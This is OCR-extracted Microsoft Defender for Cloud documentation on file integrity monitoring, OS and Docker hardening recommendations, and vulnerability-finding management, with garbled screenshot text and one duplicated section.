Add server exceptions in this \Netlogon\Parameters\DCAllowedNTLMServers 
domain 


Network security: Restrict NTLM: ©» MACHINE\System\CurrentControlSet\Services 

Audit NTLM authentication in \Netlogon\Parameters\AuditNTLMInDomain 

this domain 
© Note 
To learn more about registry settings supported by various operating system 
versions, refer to the Group Policy Settings reference spreadsheet Z. 


To configure FIM to monitor registry baselines: 


1. In the Add Windows Registry for Change Tracking window, select the Windows 
Registry Key text box. 


2. Enter the following registry key: 
reg 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameter 
S 


Dashboard > Microsoft Defender for Cloud > File Integrity Monitoring > File Integrity Mon Add Windows Registry for Ch x 
Warkspace Configuration 


Ch racking X Discard © 


EZ Documentation 
Enabled 


GD Se 


Windows Registry | Windows Files Linux Files File Content Windows Services 


* 
Gro! ab... Registry Key Recu... ew 


Enter a name for the item 


Group 


| Custom 


Windows Registry Key * 


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netl 
ogon\Parameters I 


Track changes to Windows files 


1. In the Add Windows File for Change Tracking window, in the Enter path text box, 
enter the folder that contains the files that you want to track. In the example in the 
following figure, Contoso Web App resides in the D:\ drive within the 
ContosWebApp folder structure. 


2. Create a custom Windows file entry by providing a name of the setting class, 
enabling recursion, and specifying the top folder with a wildcard (*) suffix. 


Dashboard > Microsoft Defender for Cloud File Integrity Monitoring > File Integrity Mon Add Windows File for Change x 
Workspace Configuration 
Change Tracking x Discard 


EZ Documentation Enabled 


False) 
Windows Files MB 


Grou... Enab... Path 


lows Registry Linux Files File Content Windows Services 


Item Name * 


Type 


Enter a name for the item 


No results 


Group 


Custom 


Enter Path * 


Enter Path 


Path Type 


File 


Recursion 


Upload file content 


True False j 


Retrieve change data 


File Integrity Monitoring data resides within the Azure Log 
Analytics/ConfigurationChange table set. 


1. Set a time range to retrieve a summary of changes by resource. 


In the following example, we're retrieving all changes in the last 14 days in the 


categories of registry and files: 


ConfigurationChange 

| where TimeGenerated > ago(14d) 

| where ConfigChangeType in ('Registry', 'Files') 
| summarize count() by Computer, ConfigChangeType 


2. To view details of the registry changes: 
a. Remove Files from the where clause. 
b. Remove the summarization line and replace it with an ordering clause: 


ConfigurationChange 

| where TimeGenerated > ago(14d) 

| where ConfigChangeType in ('Registry') 
| order by Computer, RegistryKey 


Reports can be exported to CSV for archival and/or channeled to a Power BI report. 


contosoretail-it = Time range: Set in query 


ə  ConfigurationChange 
| where TimeGenerated > ago(14d) 
| where ConfigChangeType in (‘Registry’) 
| order by Computer, RegistryKey 


Export to CSV - All Columns 


Export to CSV - Displayed Columns 


Export to Power BI (M Query) 
©” 00:00:01 


Completed 
SETABLE wllCHART Columns v 


Drag a column header and drop it here to group by that column 


Computer Yy ConfigChangeType Y ChangeCategory Y SourceComputerld Y SoftwareType Y SoftwareName Y Previo 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
> retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
wv retailEUS3 Registry Modified 4152690f-b8ff-47f9-9420-7dd4def8fe14 
Computer retailEUS3 
ConfigChangeType Registry 
Lha DICO Die _-Madified.. 


Next steps 


Learn more about Defender for Cloud in: 


e Setting security policies - Learn how to configure security policies for your Azure 


subscriptions and resource groups. 


e Managing security recommendations - Learn how recommendations help you 
protect your Azure resources. 
e Azure Security blog’ - Get the latest Azure security news and information. 


Review hardening recommendations 


Article e 08/30/2023 


O Note 


As the Log Analytics agent (also known as MMA) is set to retire in August 2024”, 
all Defender for Servers features that currently depend on it, including those 
described on this page, will be available through either Microsoft Defender for 
Endpoint integration or agentless scanning, before the retirement date. For more 
information about the roadmap for each of the features that are currently rely on 
Log Analytics Agent, see this announcement. 


To reduce a machine's attack surface and avoid known risks, it's important to configure 
the operating system (OS) as securely as possible. 


The Microsoft cloud security benchmark has guidance for OS hardening, which has led 
to security baseline documents for Windows and Linux. 


Use the security recommendations described in this article to assess the machines in 


your environment and: 


e Identify gaps in the security configurations 
e Learn how to remediate those gaps 


Availability 


Aspect Details 


Release state: Preview. 
The Azure Preview Supplemental Terms % include additional legal terms 
that apply to Azure features that are in beta, preview, or otherwise not yet 
released into general availability. 


Pricing: Free 


Prerequisites: Machines must (1) be members of a workgroup, (2) have the Guest 
Configuration extension, (3) have a system-assigned managed-identity, and 
(4) be running a supported OS: 
e Windows Server 2012, 2012r2, 2016 or 2019 
e Ubuntu 14.04, 16.04, 17.04, 18.04 or 20.04 
e Debian 7, 8, 9, or 10 
e CentOS 7 or 8 
e Red Hat Enterprise Linux (RHEL) 7 or 8 


Aspect Details 


e Oracle Linux 7 or 8 
e SUSE Linux Enterprise Server 12 


Required roles and To install the Guest Configuration extension and its prerequisites, write 
permissions: permission is required on the relevant machines. 
To view the recommendations and explore the OS baseline data, read 
permission is required at the subscription level. 


Clouds: OO Commercial clouds 
* National (Azure Government, Microsoft Azure operated by 21Vianet) 


What are the hardening recommendations? 


Microsoft Defender for Cloud includes two recommendations that check whether the 
configuration of Windows and Linux machines in your environment meet the Azure 
security baseline configurations: 


e For Windows machines, Vulnerabilities in security configuration on your Windows 
machines should be remediated (powered by Guest Configuration) E compares 
the configuration with the Windows security baseline. 

e For Linux machines, Vulnerabilities in security configuration on your Linux 
machines should be remediated (powered by Guest Configuration) E compares 
the configuration with the Linux security baseline. 


These recommendations use the guest configuration feature of Azure Policy to compare 
the OS configuration of a machine with the baseline defined in the Microsoft cloud 
security benchmark. 


Compare machines in your subscriptions with 
the OS security baselines 


To compare machines with the OS security baselines: 
1. From Defender for Cloud's portal pages, open the Recommendations page. 
2. Select the relevant recommendation: 


e For Windows machines, Vulnerabilities in security configuration on your 
Windows machines should be remediated (powered by Guest Configuration) E 
e For Linux machines, Vulnerabilities in security configuration on your Linux 


machines should be remediated (powered by Guest Configuration) Z 


Controls Max score Current Score Potential score increase Unhealthy resources Resol ns 


v Remediate security configurations 4 0.69 D + 6% (3.31 points) 201 of 553 resources 
D Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration) EA 16 of 116 VMs & servers Mill 
Al Vulnerabilities in security configuration on your Linux machines should be remediated (powered by Guest Configuration) b E 200f94VMs & servers ES 


3. On the recommendation details page you can see: 
a. The affected resources. 
b. The specific security checks that failed. 


Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration) = x 


@ Exempt G view policy definition E Open query v 


Severity Freshness interval 
| Low © 24 Hours 
wv Description 


v Related recommendations (2) 


\ Remediation steps 


© Affected resources 
© Security checks 


Findings 


[A Search to filter items... 


Rule Id Security check Policy category Applies to 

3132d56-9c29-4d2a-bc92-fc8 1/6 16e User Account Control: Behavior of the elevation prompt for standard users Security Options - User Account Control 16 of 16 resources 
c8a4401-ff7a-4a6d-add4-758acce6b76¢ User Account Control: Behavior of the elevation prompt for administrators in Admin A... Security Options - User Account Control 16 of 16 resources 
96753147-69cd-4a38-a517-3ebf4e5284cd User Account Control: Admin Approval Mode for the Built-in Administrator account Security Options - User Account Control 16 of 16 resources 
9c16b7a-4f7c-4947-a2be-f47483dd2ac7 Devices: Allow undock without having to log on Security Options - Devices 16 of 16 resources 
0571e435-5c84-48bb-b1c9-6e7eae137153 Turn off Internet Connection Wizard if URL connection is referring to Microsoft.com Administrative Templates - System 16 of 16 resources 
d0f025af-b24b-49ab-9b75-60f485ed5407 Turn off Autoplay ‘Windows Components 16 of 16 resources 
bea7aff2-db2d-4db7-bf47-0e475db398a3 Turn off app notifications on the lock screen Administrative Templates - System 16 of 16 resources 
3e20b64c-0356-4e95-ba4e-2ebd51e10bb9 System: Specify the maximum log file size (KB) ‘Windows Components 16 of 16 resources 
Sbfb71¢2-897f-4ccb-b7d5-7181b1f2527a Setup: Specify the maximum log file size (KB) ‘Windows Components 16 of 16 resources 
7869ddef-04ab-4cc5-90f2-Se6fd1540cba Set the default behavior for AutoRun ‘Windows Components 16 of 16 resources 

m23 45 6 7 > 


4. To learn more about a specific finding, select it. 


Vulnerabilities in security configuration on your Windows macl | Devices: Allow undock without having to lo... 


© Exempt G! view policy definition E Open query v 


A^ Description 
Severity Freshness interval Devices: Allow undock without having to log on 
Low 24 Hours 
^ Impact 
Users who have docked their computers will have to log on to the local console before 
they can undock their computers. For computers that do not have docking stations, this 
\ Description policy setting will have no impact. 
v Related recommendations (2) Awi Ganarel information: 


ban Rule Id £9¢16b7a-4f7c-4947-a2be-f47483dd2ac7 
wv Remediation steps 


Name Devices: Allow undock without having to log on 


v Affected resources Category Security Options - Devices 


^ Security checks Scan time 10/3/2021 11:43:05 AM (UTC) 


Findings 


A Vulnerability 


l Æ Search to filter items... If this policy setting is enabled, anyone with physical access to portable computers in 


Rule Id Security check Polis docking stations could remove them and possibly tamper with them. 
a132d56-9c29-4d2a-bc92-fc81f616e540 User Account Control: Behavior of the elevation pro... Sect A Remediation 
fc8a4401-ff7a-4a6d-add4-758acce6b76c User Account Control: Behavior of the elevation pro... Sect Disable the Devices: Allow undock without having to log on setting. 


967531f7-69cd-4a38-a517-3ebf4e5284cd User Account Control; Admin Approval Mode for the... Sect \ Affected resources 


0571e435-5c84-48bb-b1c9-6e7eae13715a Turn off Internet Connection Wizard if URL connect... Adm 


5. Other investigation possibilities: 


e To view the list of machines that have been assessed, open Affected 


resources. 


e To view the list of findings for one machine, select a machine from the 
Unhealthy resources tab. A page will open listing only the findings for that 
machine. 


Next steps 


In this document, you learned how to use Defender for Cloud's guest configuration 
recommendations to compare the hardening of your OS with the Azure security 
baseline. 


To learn more about these configuration settings, see: 


Windows security baseline 
e Linux security baseline 


e Microsoft cloud security benchmark 


Check out common questions about Defender for Servers. 


Review Docker host hardening 
recommendations 
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Microsoft Defender for Cloud identifies unmanaged containers hosted on laaS Linux 
VMs, or other Linux machines running Docker containers. Defender for Cloud 
continuously assesses the configurations of these containers. It then compares them 
with the Center for Internet Security (CIS) Docker Benchmark Z. 


Defender for Cloud includes the entire ruleset of the CIS Docker Benchmark and alerts 
you if your containers don't satisfy any of the controls. When it finds misconfigurations, 
Defender for Cloud generates security recommendations. Use Defender for Cloud's 


recommendations page to view recommendations and remediate issues. 


When vulnerabilities are found, they're grouped inside a single recommendation. 


O Note 


These CIS benchmark checks will not run on AKS-managed instances or Databricks- 


managed VMs. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Requires Microsoft Defender for Servers Plan 2 
Required roles and permissions: Reader on the workspace to which the host connects 
Clouds: OO Commercial clouds 


© National (Azure Government, Azure China 21Vianet) 
© Connected AWS accounts 


Identify and remediate security vulnerabilities 
in your Docker configuration 


1. From Defender for Cloud's menu, open the Recommendations page. 


2. Filter to the recommendation Vulnerabilities in container security configurations 
should be remediated and select the recommendation. 


The recommendation page shows the affected resources (Docker hosts). 


Vulnerabilities in container security configurations x 
should be remediated 


^ Description 


Remediate vulnerabilities in security configuration on machines with Docker installed to protect them from attacks 


v Remediation steps 


^ Affected resources 


Unhealthy resources (2) Healthy resources (0) Not applicable resources (0) 


| O Search Container hosts 


| Name Ty Subscription Resource Group 
g iy, dockerVm-RedHat yaProdtTest2 yaRG 
I el DockerOnlaaSDemo yaProdTest2 yaRG 

© Note 


Machines that aren't running Docker will be shown in the Not applicable 
resources tab. They'll appear in Azure Policy as Compliant. 


3. To view and remediate the CIS controls that a specific host failed, select the host 
you want to investigate. 


Q Tip 


If you started at the asset inventory page and reached this recommendation 
from there, select the Take action button on the recommendation page. 


Log Analytics opens with a custom operation ready to run. The default custom 


query includes a list of all failed rules that were assessed, along with guidelines to 
help you resolve the issues. 


Olo d 


ETT DefaultWorkspace-O4cdéfff-ef34-415e-b907-3c90df65c0e5-WEU 


d New Query 1* 


d DefaultWorkspace... 


+ 


Select scope Time range: Custom 


Save Y ® Copy link V 


== "Failed" 


Resource Y 


DockerOnlaaSDemo 


DockerOnlaaSDemo 


DockerOnlaaSDemo 


EZ Example queries 


++ New alert rule 


x 


Ca Query explorer & D 


> Export v 


project CceId, Description, Resource, ResourceGroup, RuleSeverity, ActualResult, BaselineType, Type, SubscriptionId, - 


» 


© 00:00:02.844 EI 23 records  ¥ 


ResourceGroup Y 
yaRG 


yaRG 


» 1 SecurityBaseline 
2 | where BaselineType == "Docker" 
3 | where Computer == “DockerOnIaaSDemo" and AnalyzeResult 
4 | summarize arg_max(TimeGenerated, *) by CceId 
5f 
6 | order by RuleSeverity asc nulls last 
Results Chart DU columns v © Display time (UTC+00:00) GS | Group columns 
Completed. Showing results from the custom time range. 
EA ee 
2; Cceld y Description 
3 CIS-CE-2-01 Ensure network traffic is restricted between containers on the default br... 
w 
a CIS-CE-2-02 Ensure the logging level is set to ‘info’. 
ail 
a CIS-CE-2-06 Ensure TLS authentication for Docker daemon is configured 
£ 


CIS-CE-3-09 
CIS-CE-2-12 
CIS-CE-2-14 


CIS-CE-2-18 


Ensure that TLS CA certificate file ownership is set to root:root 


Ensure centralized and remote logging is configured 


Ensure live restore is Enabled 


Ensure containers are restricted from acquiring new privileges. 


4. Tweak the query parameters if necessary. 


DockerOnlaaSDemo 
DockerOnlaaSDemo 
DockerOnlaaSDemo 


DockerOnlaaSDemo 


yaRG 
yaRG 
yaRG 
yaRG 


yaRG 


RuleSeverity 
Critical 
Critical 
Critical 
Critical 
Critical 
Critical 


Critical 


Y 


ActualResult 

Output of [/usr, 
Wanted: log-lev 
Wanted: tlsverif 
tlscacert is misc 
Output of [/usr, 
Wanted: live-re: 


Wanted: no-nev 


> 


5. When you're sure the command is appropriate and ready for your host, select Run. 


Next steps 


Docker hardening is just one aspect of Defender for Cloud's container security features. 


Learn more Container security in Defender for Cloud. 


View and remediate findings from 
vulnerability assessment solutions on 
your VMs 
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When your vulnerability assessment tool reports vulnerabilities to Defender for Cloud, 
Defender for Cloud presents the findings and related information as recommendations. 
In addition, the findings include related information such as remediation steps, relevant 
CVEs, CVSS scores, and more. You can view the identified vulnerabilities for one or more 
subscriptions, or for a specific VM. 


View findings from the scans of your virtual 
machines 


To view vulnerability assessment findings (from all of your configured scanners) and 
remediate identified vulnerabilities: 


1. From Defender for Cloud's menu, open the Recommendations page. 
2. Select the recommendation Machines should have vulnerability findings resolved. 


Defender for Cloud shows you all the findings for all VMs in the currently selected 
subscriptions. The findings are ordered by severity. 


Vulnerabilities in your virtual machines should be remediated 


v Description 


v Remediation steps 


[> gera resources | 


^ Security Checks 


Findings 


| Ø Search to filter items... 


ID Security Check Category Applies To 

124586 Red Hat Linux Kernel Ke... Local 1 of 9 resources 
236587 Red Hat Update for linu... RedHat 1 of 9 resources 
236613 Red Hat Update for linu... RedHat 1 of 9 resources 
236173 Red Hat Update for util-.. RedHat 1 of 9 resources 
370472 Linux Kernel Double Fet... Local 1 of 9 resources 


Severity 
@ High 
@ High 
@ High 
A Medium 


@ Low 


e 


3. To filter the findings by a specific VM, open the "Affected resources" section and 


click the VM that interests you. Or you can select a VM from the resource health 


view, and view all relevant recommendations for that resource. 


Defender for Cloud shows the findings for that VM, ordered by severity. 


4. To learn more about a specific vulnerability, select it. 


Dashboard > Security Center > Vulnerabilities in your virtual machines 236366-Red Hat Update for nss (RHSA-201... 
vmtredhat 


“ Description 


Resource Total vulnerabilities Red Hat Update for nss (RHSA-2017:1365) 


a vm redhat 64 


A^ Impact 


An attacker could use this flaw to crash a server application compiled against the 


NSS library. 
Findings 
7 ^ General information 
O Search to filter items... ID 236366 
D Security Check Severity @ High 
237861 Red Hat Update for nss, nss-s¢ Category RedHat 
(1/2017, 12:5 
236613 Red Hat Update for linux-firmv Published Time 6/1/2017, 12:59 PM GMT+3 
Time Generated 7/13/2020, 8:08 AM GMT+3 
237810 Red Hat Update for kernel (RH 
Patchable Yes 
236387 Red Hat Update for kernel (RH CVSS base score v2.0: 5 
236530 Red Hat Update for wpa_supp v3.0: 7.5 
236966 Red Hat Update for kernel (RH CVEs CVE-2017-7502 & 
236366 Red Hat Update for nss (RHSA 
236144 Red Hat Update for python (RI \ Threat 
237435 Red Hat Update for blktrace (F = Toy 
v Remediation 
237452 Red Hat Update for sssd (RHS. 


v Additional References 


The details pane that appears contains extensive information about the 
vulnerability, including: 


e Links to all relevant CVEs (where available) 
e Remediation steps 
e Any additional reference pages 


5. To remediate a finding, follow the remediation steps from this details pane. 


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can 
optionally disable it. Disabled findings don't impact your secure score or generate 
unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios include: 


e Disable findings with severity below medium 

e Disable findings that are non-patchable 

e Disable findings with CVSS score below 6.5 

e Disable findings with specific text in the security check or category (for example, 
“RedHat”, “CentOS Security Update for sudo”) 


@ Important 


To create a rule, you need permissions to edit a policy in Azure Policy. Learn more 
in Azure RBAC permissions in Azure Policy. 


To create a rule: 


1. From the recommendations detail page for Machines should have vulnerability 
findings resolved £ , select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 

e Category 

e Security check 

e CVSS scores (v2, v3) 
e Severity 

e Patchable status 


4. Select Apply rule. 


Home > Microsoft Defender for Cloud > 


Disable rule 
Vulnerabilities in your virtual ma} STEE 


S Disable rule 


^ Description Disable Action 


Monitors for vulnerabilities on your virtual machines as disco 
ú Disable findings that match any of the following criteria: 


wv Remediation steps IDs © 


v Affected resources 


CVEs © 


^ Security Checks 


Findings Disabled findings Categories © 


Ø Search to filter items... 


Security checks © 


ID Security Check 


91674 Microsoft Wint CVSS2 score less than © 


91668 Microsoft Wint 


91609 Microsoft Win}  CVSS3 score less than © 


100400 Microsoft Inter 
Minimum severity © 


91653 Microsoft Wint 


None 


91622 Microsoft Wint 


L] Non-patchable © 


100410 Microsoft Inter 


91605 Microsoft Wint Justification (optional) 


Trigger Logic App 


@ Important 


Changes might take up to 24hrs to take effect. 


5. To view, override, or delete a rule: 
a. Select Disable rule. 
b. From the scope list, subscriptions with active rules show as Rule applied. 


Disable rule 


41 subscriptions 


You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your 
secure score 


Item Current status More 
bai [+s] ) Alaf-S1ab-2d7cd011db47 4 subscri 
v (4s) cnat orchestratior e Publ 
? ASC DEMO Rule applied g J 
KA JA CnAI Orchestration Service Public Corp prod (4 of 5 subsc View rule 
v (+s) Demonstration (2 of 2 subscriptions) Delete rule 


c. To view or delete the rule, select the ellipsis menu ("..."). 


Export the results 


To export vulnerability assessment results, you'll need to use Azure Resource Graph & 
(ARG). This tool provides instant access to resource information across your cloud 
environments with robust filtering, grouping, and sorting capabilities. It's a quick and 
efficient way to query information across Azure subscriptions programmatically or from 
within the Azure portal. 


For full instructions and a sample ARG query, see the following Tech Community post: 
Exporting vulnerability assessment results in Microsoft Defender for Cloud ©. 


Next steps 


This article described the Microsoft Defender for Cloud vulnerability assessment 
extension (powered by Qualys) for scanning your VMs. For related material, see the 
following articles: 


e Learn about the different elements of a recommendation 
e Learn how to remediate recommendations 


View and remediate findings from 
vulnerability assessment solutions on 
your VMs 
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When your vulnerability assessment tool reports vulnerabilities to Defender for Cloud, 
Defender for Cloud presents the findings and related information as recommendations. 
In addition, the findings include related information such as remediation steps, relevant 
CVEs, CVSS scores, and more. You can view the identified vulnerabilities for one or more 
subscriptions, or for a specific VM. 


View findings from the scans of your virtual 
machines 


To view vulnerability assessment findings (from all of your configured scanners) and 
remediate identified vulnerabilities: 


1. From Defender for Cloud's menu, open the Recommendations page. 
2. Select the recommendation Machines should have vulnerability findings resolved. 


Defender for Cloud shows you all the findings for all VMs in the currently selected 
subscriptions. The findings are ordered by severity. 


Vulnerabilities in your virtual machines should be remediated 


v Description 


v Remediation steps 


[> gera resources | 


^ Security Checks 


Findings 


| Ø Search to filter items... 


ID Security Check Category Applies To 

124586 Red Hat Linux Kernel Ke... Local 1 of 9 resources 
236587 Red Hat Update for linu... RedHat 1 of 9 resources 
236613 Red Hat Update for linu... RedHat 1 of 9 resources 
236173 Red Hat Update for util-.. RedHat 1 of 9 resources 
370472 Linux Kernel Double Fet... Local 1 of 9 resources 


Severity 
@ High 
@ High 
@ High 
A Medium 


@ Low 


e 


3. To filter the findings by a specific VM, open the "Affected resources" section and 


click the VM that interests you. Or you can select a VM from the resource health 


view, and view all relevant recommendations for that resource. 


Defender for Cloud shows the findings for that VM, ordered by severity. 


4. To learn more about a specific vulnerability, select it. 


Dashboard > Security Center > Vulnerabilities in your virtual machines 236366-Red Hat Update for nss (RHSA-201... 
vmtredhat 


“ Description 


Resource Total vulnerabilities Red Hat Update for nss (RHSA-2017:1365) 


a vm redhat 64 


A^ Impact 


An attacker could use this flaw to crash a server application compiled against the 


NSS library. 
Findings 
7 ^ General information 
O Search to filter items... ID 236366 
D Security Check Severity @ High 
237861 Red Hat Update for nss, nss-s¢ Category RedHat 
(1/2017, 12:5 
236613 Red Hat Update for linux-firmv Published Time 6/1/2017, 12:59 PM GMT+3 
Time Generated 7/13/2020, 8:08 AM GMT+3 
237810 Red Hat Update for kernel (RH 
Patchable Yes 
236387 Red Hat Update for kernel (RH CVSS base score v2.0: 5 
236530 Red Hat Update for wpa_supp v3.0: 7.5 
236966 Red Hat Update for kernel (RH CVEs CVE-2017-7502 & 
236366 Red Hat Update for nss (RHSA 
236144 Red Hat Update for python (RI \ Threat 
237435 Red Hat Update for blktrace (F = Toy 
v Remediation 
237452 Red Hat Update for sssd (RHS. 


v Additional References 


The details pane that appears contains extensive information about the 
vulnerability, including: 


e Links to all relevant CVEs (where available) 
e Remediation steps 
e Any additional reference pages 


5. To remediate a finding, follow the remediation steps from this details pane. 


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can 
optionally disable it. Disabled findings don't impact your secure score or generate 
unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios include: 


e Disable findings with severity below medium 

e Disable findings that are non-patchable 

e Disable findings with CVSS score below 6.5 

e Disable findings with specific text in the security check or category (for example, 
“RedHat”, “CentOS Security Update for sudo”) 


@ Important 


To create a rule, you need permissions to edit a policy in Azure Policy. Learn more 
in Azure RBAC permissions in Azure Policy. 


To create a rule: 


1. From the recommendations detail page for Machines should have vulnerability 
findings resolved £ , select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 

e Category 

e Security check 

e CVSS scores (v2, v3) 
e Severity 

e Patchable status 


4. Select Apply rule. 


Home > Microsoft Defender for Cloud > 


Disable rule 
Vulnerabilities in your virtual ma} STEE 


S Disable rule 


^ Description Disable Action 


Monitors for vulnerabilities on your virtual machines as disco 
ú Disable findings that match any of the following criteria: 


wv Remediation steps IDs © 


v Affected resources 


CVEs © 


^ Security Checks 


Findings Disabled findings Categories © 


Ø Search to filter items... 


Security checks © 


ID Security Check 


91674 Microsoft Wint CVSS2 score less than © 


91668 Microsoft Wint 


91609 Microsoft Win}  CVSS3 score less than © 


100400 Microsoft Inter 
Minimum severity © 


91653 Microsoft Wint 


None 


91622 Microsoft Wint 


L] Non-patchable © 


100410 Microsoft Inter 


91605 Microsoft Wint Justification (optional) 


Trigger Logic App 


@ Important 


Changes might take up to 24hrs to take effect. 


5. To view, override, or delete a rule: 
a. Select Disable rule. 
b. From the scope list, subscriptions with active rules show as Rule applied. 


Disable rule 


41 subscriptions 


You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your 
secure score 


Item Current status More 
bai [+s] ) Alaf-S1ab-2d7cd011db47 4 subscri 
v (4s) cnat orchestratior e Publ 
? ASC DEMO Rule applied g J 
KA JA CnAI Orchestration Service Public Corp prod (4 of 5 subsc View rule 
v (+s) Demonstration (2 of 2 subscriptions) Delete rule 


c. To view or delete the rule, select the ellipsis menu ("..."). 


Export the results 


To export vulnerability assessment results, you'll need to use Azure Resource Graph & 
(ARG). This tool provides instant access to resource information across your cloud 
environments with robust filtering, grouping, and sorting capabilities. It's a quick and 
efficient way to query information across Azure subscriptions programmatically or from 
within the Azure portal. 


For full instructions and a sample ARG query, see the following Tech Community post: 
Exporting vulnerability assessment results in Microsoft Defender for Cloud ©. 


Next steps 


This article described the Microsoft Defender for Cloud vulnerability assessment 
extension (powered by Qualys) for scanning your VMs. For related material, see the 
following articles: 


e Learn about the different elements of a recommendation 
e Learn how to remediate recommendations 


File Integrity Monitoring using the Log 
Analytics agent 


Article e 05/10/2023 


To provide File Integrity Monitoring (FIM), the Log Analytics agent uploads data to the 
Log Analytics workspace. By comparing the current state of these items with the state 
during the previous scan, FIM notifies you if suspicious modifications have been made. 


O Note 


As the Log Analytics agent (also known as MMA) is set to retire in August 2024”, 
all Defender for Servers features that currently depend on it, including those 
described on this page, will be available through either Microsoft Defender for 
Endpoint integration or agentless scanning, before the retirement date. For more 
information about the roadmap for each of the features that are currently rely on 
Log Analytics Agent, see this announcement. 


In this article, you'll learn how to: 


e Enable File Integrity Monitoring with the Log Analytics agent 
e Disable File Integrity Monitoring 

e Monitor workspaces, entities, and files 

e Compare baselines using File Integrity Monitoring 


© Note 


File Integrity Monitoring may create the following account on monitored SQL 
Servers: NT Service\HealthService 


If you delete the account, it will be automatically recreated. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Requires Microsoft Defender for Servers Plan 2. 


Using the Log Analytics agent, FIM uploads data to the Log Analytics 


Aspect Details 


workspace. Data charges apply, based on the amount of data you upload. 
See Log Analytics pricing Z to learn more. 


Required roles and Workspace owner can enable/disable FIM (for more information, see Azure 
permissions: Roles for Log Analytics). 
Reader can view results. 


Clouds: Lv] Commercial clouds 
OO National (Azure Government, Microsoft Azure operated by 21Vianet) 
Supported only in regions where Azure Automation's change tracking 
solution is available. 
Lv] Azure Arc enabled devices. 
See Supported regions for linked Log Analytics workspace. 
Learn more about change tracking. 
OO Connected AWS accounts 


Enable File Integrity Monitoring with the Log 
Analytics agent 


FIM is only available from Defender for Cloud's pages in the Azure portal. There's 
currently no REST API for working with FIM. 


1. From the Workload protections dashboard's Advanced protection area, select File 
integrity monitoring. 


O Microsoft Defender for Cloud | Workload protections 


g 73 subscriptions 
[2 Search (Ctrl+ Y Subscriptions C? What's new 
General Defender for Cloud coverage 
© overview 
G a started EE, 
(Getting |sextes E 385/204 eee 34/34 @ 14m GO 85/85 ® 116 7m6 
= Recommendations Servers Kubernetes Container registries App Service Key Vault 
© Security alerts ipai 
@ Inventory 
@ Workbooks = ere 
E, 39:39 = 417/4% Ea 23/24 23/24 
& Community I Fully covered (93%) 
z Azure SQL databas.. Storage Resource Manager ... DNS subscriptions 

Agent not installed (3.7%) Install 
@ Diagnose and solve problems 

Not covered (3.3%) Upgrade all Upgrade Upgrade Upgrade Upgrade 


Cloud Security 
© secure Score Security alerts 
D Regulatory compliance 


Q workload protections 


E Firewall Manager 


= TTT 
ricing & settings 


Advanced protection 


d eee EZ VM vulnerability assessment © Just-in-time VM access E, Adaptive application control d Container image scanning GA Adaptive network hardening 
149 unprotected 15 unprotected 50 unprotected 8 unprotected 14 Unprotected 
@ Cloud connectors A 
E, SQL vulnerability assessment B File integrity monitoring pen Network map E loT security 
-= Ten 


10 Unprotected d 


The following information is provided for each workspace: 


e Total number of changes that occurred in the last week (you may see a dash 


wow 


if FIM isn't enabled on the workspace) 


e Total number of computers and VMs reporting to the workspace 


e Geographic location of the workspace 
e Azure subscription that the workspace is under 


2. Use this page to: 


e Access and view the status and settings of each workspace 


e Upgrade the workspace to use enhanced security features. This 
icon indicates that the workspace or subscription isn't protected with 


Microsoft Defender for Servers. To use the FIM features, your subscription 


must be protected with this plan. Learn about how to enable Defender for 


Servers. 


° Enable FIM on all machines under the workspace and configure 
the FIM options. This icon indicates that FIM isn't enabled for the workspace. 


If there's no enable or upgrade button, and the space is blank, it means that 


FIM is already enabled on the workspace. 
File Integrity Monitoring & 
d Refresh 


À File Integrity Monitoring 


Choose a workspace to view its File Integrity Monitoring dashboard 


Workspace Name Ty Totalchanges 7 Total servers TL Location N 
GO la-sh360-00edf 0 0 East US 
E la-sh360-9472d 0 0 East US 
GO cha 1.1K 318 East US 
GO  ch-la-dev 546 270 East US 
OU defaultworkspace-Oba- 0 0 East US 
GO la-sh360-0ba67 0 0 East US 


Subscription N 
Contoso Dev_EUS 
Contoso Dev_India 
Contoso Hotels 

Contoso Hotels - Dev 
Contoso Infra1 


Contoso Infra1 


UPGRADE PLAN 


ENABLE do 
UPGRADE PLAN 


3. Select ENABLE. The details of the workspace including the number of Windows 


and Linux machines under the workspace is shown. 


Enable File Integrity Monitoring & x 


defaultworkspace-04 


> What is File Integrity Monitoring? 


© Enabling file integrity monitoring affects all machines connected to the selected workspace (defaultworkspace-04) 


Windows Servers Linux Servers LEARN MORE 


0 4 Learn more about File Integrity Monitoring & 


Recommended settings 
E > windows Files 
E > Registry 
E > Linux Files 


File Integrity Monitoring (FIM) uploads data to the Log Analytics workspace. Data charges will apply, based on the E 
amount of data you upload. To learn more about Log Analytics pricing click here. 


Selected settings from above are applied. You can modify the settings later using ‘File Integrity Monitoring’ settings 


File Integrity Monitoring leverages the Change Tracking solution enabled on your workspace. 


Enable File Integrity Monitoring m 


The recommended settings for Windows and Linux are also listed. Expand 
Windows files, Registry, and Linux files to see the full list of recommended items. 


4. Clear the checkboxes for any recommended entities you don't want to be 
monitored by FIM. 


5. Select Apply file integrity monitoring to enable FIM. 


You can change the settings at any time. Learn more about editing monitored entities. 


Disable File Integrity Monitoring 


FIM uses the Azure Change Tracking solution to track and identify changes in your 
